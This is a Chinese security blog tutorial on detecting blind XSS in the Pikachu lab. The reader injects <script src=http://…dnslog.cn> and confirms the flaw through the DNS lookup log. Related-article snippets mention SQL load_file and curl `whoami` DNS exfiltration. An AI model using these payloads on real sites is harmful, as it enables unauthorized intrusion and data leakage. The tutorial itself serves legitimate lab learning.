DNSLog漏洞探测(三)之XSS漏洞实战

最新推荐文章于 2024-05-30 14:41:17 发布
最新推荐文章于 2024-05-30 14:41:17 发布
阅读量929 收藏 1
点赞数 4
分类专栏: DNSLog漏洞探测 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/134943693
版权

DNSLog漏洞探测(三)之XSS漏洞实战

通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?

DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。比如XSS(跨站脚本攻击)漏洞、RCE(远程代码执行)漏洞、XXE(XML外部实体注入)漏洞、SSRF(服务器请求伪造)漏洞等。假如目标网站没有存在漏洞,那么DNSLog平台是不会出现解析记录的。这种情况下,我们利用DNSLog平台仅仅是为了验证该漏洞是否存在。

如果我们需要用DNSLog平台去探测一个网站是否存在XSS漏洞,那么我们该怎么操作呢?

首先我们先打开DNSLog平台,点击 Get SubDomain 获取一个子域名

在这里插入图片描述

这里我们获取到的子域名是 p9coa4.dnslog.cn

这里我们使用Pikachu的靶场作为演示

在这里插入图片描述

接下来,由于这里文本框的长度是有限制的,所以我们先按下 F12,将文本框的长度参数修改为200

在这里插入图片描述

然后在文本框提交我们的payload,那么如何构造我们的payload呢?

#原始payload
<script src=http://xxxxxx.dnslog.cn></script>
#只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名
<script src=http://p9coa4.dnslog.cn></script>

我们只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名,并放入文本框点击提交就好了

在这里插入图片描述

点击提交后

在这里插入图片描述

现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞

在这里插入图片描述

怰月
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 227
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1738
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 3671
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息DNSLog的实现方式有很多种,其中最常见的是使用第DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
2021 OWASP TOP 3:注入漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-08 809
文章全面的总结了包含SQL注入、命令注入等在内的多种注入漏洞,篇幅较长,完整的看完可能需要很多时间,有兴趣的话,推荐新手看完,大佬请飘过。
dnslog外带是什么
来而不往非礼也
05-14 829
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
dnslog注入
weixin_33928137的博客
12-21 268
   使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。看到有人问过。http://zone.wooyun.org/content/27440其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的。windows下...
DNSLog漏洞探测(七)之SQL注入漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-14 667
在前面的文章之中,我们已经学习了XSS、RCE、XXE、SSRF漏洞中有关于DNSLog平台的使用。这些漏洞本身在执行时就有解析URL地址,发起网络请求的操作,所以只要我们把DNSLog平台获取的子域名地址发送到存在漏洞的服务器上,就会产生DNSLog的解析记录,这样就可以证明该漏洞的存在。
浅析DNSlog在渗透测试中的实战技巧
热门推荐
道阻且长,行则将至。
05-23 1万+
文章目录前言SSRF 盲打XSS的盲打XXE的盲打SQL的盲注RCE的盲打总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。 DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相
web漏洞总结大全(基础)
Ba1_Ma0的博客
01-20 2368
web漏洞总结大全(基础)
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户...
web漏洞XSS_TEST漏洞实践练习代码
04-25
web漏洞XSS_TEST漏洞实践练习代码,下载解压后可直接使用。
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
XSS & CSRF 】访问时篡改密码——以DVWA-High为例
Mr_Fmnwon的博客
05-23 1080
第二阶段,增加了一个CSRF-Token。关于XSS的利用,cookie的泄露,在上述博客中已很清晰地说明白了~从一开始无法利用,到思考需要的条件,一步步实现,对CSRF、XSS的理解更深了。唯一觉得遗憾的是,chat强大、解放编写代码门槛的同时,也让我编码能力——程序员的核心能力——迟滞不前甚至降低许多。。。唉。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1125
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
云端数据提取:安全、高效地利用无限资源
最新发布
Shaidou_Data的博客
05-30 622
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
ModStartBlog v9.4.0 后台安全升级,已知问题修复
qq_26450889的博客
05-29 961
ModStart 是一个基于 Laravel 模块化极速开发框架。模块市场拥有丰富的功能应用,支持后台一键快速安装,让开发者能快的实现业务功能开发。系统完全开源,基于 Apache 2.0 开源协议。
xss漏洞之加载远程js文件
06-08
XSS(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者利用这种漏洞在网页中注入恶意脚本,从而窃取用户信息或者进行其他恶意操作。 其中一种类型的XSS攻击就是加载远程js文件。攻击者可以在网页中注入恶意代码,通过调用远程服务器上的恶意js文件来实现攻击。 这种攻击可以通过以下几种方式进行防范: 1. 对用户输入进行过滤和验证,防止用户输入恶意脚本。 2. 对输出内容进行编码,防止恶意脚本被执行。 3. 使用X-XSS-Protection等HTTP头部控制来防止浏览器执行恶意脚本。 4. 使用Content Security Policy(CSP)来限制网页中可以加载的资源。 5. 及时更新网站的安全补丁,防止攻击者利用已知漏洞进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值